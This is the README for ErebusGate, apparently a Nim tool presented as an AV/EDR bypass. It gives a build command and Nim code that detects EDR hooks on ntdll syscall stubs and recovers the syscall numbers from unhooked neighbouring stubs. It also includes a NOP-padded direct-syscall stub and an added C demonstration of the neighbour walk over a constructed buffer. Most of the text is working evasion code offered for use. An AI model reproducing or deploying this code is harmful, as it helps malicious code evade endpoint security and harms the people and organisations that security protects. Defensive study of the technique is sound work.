ErebusGate
ErebusGate for Nim Bypass AV/EDR
A quick example of the Erebus Gate technique in Nim
Usage
Just compile the code (a MinGW cross-build targeting x64 Windows):

```shell
nim c -d=mingw --app=console --cpu=amd64 .\ErebusGate.nim
```
Demonstration
Check whether the first byte, or the byte at offset 3, is 0xE9 (a `JMP rel32`) to determine whether the stub is hooked. In the first case the hook overwrote `mov r10, rcx`; in the second (the Tartarus Gate case) it was placed after that instruction, over `mov eax, <SSN>`. Either way the system service number (SSN) is recovered from an unhooked neighbouring stub: step through adjacent stubs with `UP`/`DOWN` (one stub's width in either direction) until one whose byte at offset 3 is 0xB8 (`mov eax, imm32`) is found, read its SSN from offset 4, and add or subtract the number of stubs walked, since SSNs are assigned in stub order.

```nim
# Classic hook: JMP rel32 written over the first byte of the stub
elif cast[PBYTE](cast[ByteAddress](pFuncAddr))[] == 0xE9:
  for idx in countup(1, 500):
    # neighbour above: its SSN is smaller by idx
    if cast[PBYTE](cast[ByteAddress](pFuncAddr) + 3 + idx * UP)[] == 0xB8:
      tableEntry.wSysCall = cast[PWORD](cast[ByteAddress](pFuncAddr) + 4 + (idx * UP))[] + cast[WORD](idx)
      return true
    # neighbour below: its SSN is larger by idx
    if cast[PBYTE](cast[ByteAddress](pFuncAddr) + 3 + idx * DOWN)[] == 0xB8:
      tableEntry.wSysCall = cast[PWORD](cast[ByteAddress](pFuncAddr) + 4 + (idx * DOWN))[] - cast[WORD](idx)
      return true
# Tartarus Gate case: JMP rel32 at offset 3, after `mov r10, rcx`
elif cast[PBYTE](cast[ByteAddress](pFuncAddr) + 3)[] == 0xE9:
  for idx in countup(1, 500):
    if cast[PBYTE](cast[ByteAddress](pFuncAddr) + 3 + idx * UP)[] == 0xB8:
      tableEntry.wSysCall = cast[PWORD](cast[ByteAddress](pFuncAddr) + 4 + (idx * UP))[] + cast[WORD](idx)
      return true
    if cast[PBYTE](cast[ByteAddress](pFuncAddr) + 3 + idx * DOWN)[] == 0xB8:
      tableEntry.wSysCall = cast[PWORD](cast[ByteAddress](pFuncAddr) + 4 + (idx * DOWN))[] - cast[WORD](idx)
      return true
```

Note that checking only the 0xB8 byte trusts the neighbour: a neighbour that is itself hooked at offset 0 with a `JMP rel32` whose displacement happens to contain 0xB8 at that position would yield a wrong SSN. Checking the full `4C 8B D1 B8` prologue (and that the upper two bytes of the `imm32` are zero) is cheap and avoids that.
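The neighbour-stub walk above, as an added worked example in C that is not part of ErebusGate or HellsGateNim. It runs offline over a constructed buffer laid out like six consecutive x64 ntdll `Nt*` stubs, two of which are hooked (one at offset 0, one at offset 3 as in the Tartarus Gate case). The 32-byte stub spacing for `UP`/`DOWN`, the 500-neighbour bound, the base SSN and the JMP displacements are assumptions made for the demo; unlike the Nim excerpt it validates the whole clean prologue rather than only the 0xB8 byte.

```c
/* Added example: Halo's/Tartarus-Gate-style SSN recovery over a constructed
 * in-memory copy of x64 ntdll Nt* stubs. Not the project's code; no real ntdll is touched. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define STUB_SIZE 32          /* assumption: consecutive Nt* stubs are 32 bytes apart */
#define UP   (-STUB_SIZE)
#define DOWN ( STUB_SIZE)
#define MAX_NEIGHBOURS 500    /* same search bound as the Nim loop */

/* Unhooked x64 stub prologue: 4c 8b d1 (mov r10,rcx) ; b8 xx xx 00 00 (mov eax,SSN).
 * The SSN is the low 16 bits of the imm32; the upper two bytes must be zero. */
static int is_clean_stub(const uint8_t *s) {
    return s[0] == 0x4C && s[1] == 0x8B && s[2] == 0xD1 &&
           s[3] == 0xB8 && s[6] == 0x00 && s[7] == 0x00;
}

static int read_ssn(const uint8_t *s) { return (int)(s[4] | (s[5] << 8)); }

/* SSN of the stub at region[stub_off], or -1 if it cannot be recovered.
 * Offsets are bounds-checked against the region so the scan never reads outside it
 * (a real implementation would bound by ntdll's .text section). */
int resolve_ssn(const uint8_t *region, size_t region_len, size_t stub_off) {
    const uint8_t *stub = region + stub_off;
    if (is_clean_stub(stub))
        return read_ssn(stub);

    /* classic hook: JMP rel32 at offset 0; Tartarus case: JMP rel32 at offset 3 */
    if (stub[0] != 0xE9 && stub[3] != 0xE9)
        return -1;

    for (int idx = 1; idx <= MAX_NEIGHBOURS; idx++) {
        ptrdiff_t up = (ptrdiff_t)stub_off + (ptrdiff_t)idx * UP;
        if (up >= 0 && (size_t)up + 8 <= region_len && is_clean_stub(region + up))
            return read_ssn(region + up) + idx;    /* stubs above have smaller SSNs */

        ptrdiff_t down = (ptrdiff_t)stub_off + (ptrdiff_t)idx * DOWN;
        if (down >= 0 && (size_t)down + 8 <= region_len && is_clean_stub(region + down))
            return read_ssn(region + down) - idx;  /* stubs below have larger SSNs */
    }
    return -1;
}

/* Constructed sample region: six stubs with SSNs 0x18..0x1D (fabricated values). */
#define DEMO_STUBS 6
#define DEMO_BASE_SSN 0x18

static void write_clean_stub(uint8_t *dst, uint16_t ssn) {
    static const uint8_t tmpl[STUB_SIZE] = {
        0x4C, 0x8B, 0xD1,                               /* mov r10, rcx */
        0xB8, 0x00, 0x00, 0x00, 0x00,                   /* mov eax, imm32 (patched below) */
        0xF6, 0x04, 0x25, 0x08, 0x03, 0xFE, 0x7F, 0x01, /* test byte ptr [7FFE0308h], 1 */
        0x75, 0x03, 0x0F, 0x05, 0xC3,                   /* jne +3 ; syscall ; ret */
        0xCD, 0x2E, 0xC3,                               /* int 2Eh ; ret */
        0x0F, 0x1F, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00  /* nop padding to 32 bytes */
    };
    memcpy(dst, tmpl, STUB_SIZE);
    dst[4] = (uint8_t)(ssn & 0xFF);
    dst[5] = (uint8_t)(ssn >> 8);
}

static void write_jmp_rel32(uint8_t *dst) {
    const uint8_t jmp[5] = { 0xE9, 0x78, 0x56, 0x34, 0x12 }; /* fabricated displacement */
    memcpy(dst, jmp, sizeof jmp);
}

size_t build_demo_region(uint8_t *buf, size_t buflen) {
    if (buflen < DEMO_STUBS * STUB_SIZE) return 0;
    for (int i = 0; i < DEMO_STUBS; i++)
        write_clean_stub(buf + i * STUB_SIZE, (uint16_t)(DEMO_BASE_SSN + i));
    write_jmp_rel32(buf + 2 * STUB_SIZE);      /* classic hook on stub 2 */
    write_jmp_rel32(buf + 4 * STUB_SIZE + 3);  /* Tartarus-style hook on stub 4 */
    return DEMO_STUBS * STUB_SIZE;
}

int demo_is_hooked(int i) {
    uint8_t region[DEMO_STUBS * STUB_SIZE];
    build_demo_region(region, sizeof region);
    const uint8_t *s = region + i * STUB_SIZE;
    return s[0] == 0xE9 || s[3] == 0xE9;
}

int demo_resolve(int i) {
    uint8_t region[DEMO_STUBS * STUB_SIZE];
    size_t len = build_demo_region(region, sizeof region);
    return resolve_ssn(region, len, (size_t)i * STUB_SIZE);
}

int main(void) {
    for (int i = 0; i < DEMO_STUBS; i++)
        printf("stub %d: hooked=%d ssn=0x%x\n", i, demo_is_hooked(i), demo_resolve(i));
    return 0;
}
```

Stub 2 resolves to 0x1A via the clean stub 1 (0x19 + 1) and stub 4 to 0x1C via stub 3 (0x1B + 1); a hooked stub at the very start of the region would fall through to the DOWN direction because the negative offset is rejected by the bounds check.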
The syscall stub itself is "obfuscated" by interleaving NOPs between the instructions in the inline assembly. The backticked `syscall` is the Nim parameter holding the recovered SSN, not the mnemonic; Nim's `asm` statement substitutes backticked identifiers with the corresponding Nim symbols. The NOPs change the byte pattern of the stub without changing what it does:

```nim
asm """
  nop
  mov r10, rcx
  nop
  mov eax, `syscall`
  nop
  syscall
  ret
"""
```

Because the block ends with its own `ret`, the enclosing proc must be declared with the `{.asmNoStackFrame.}` pragma so Nim does not wrap it in a prologue and epilogue of its own.

References
Much of this work builds on HellsGateNim.
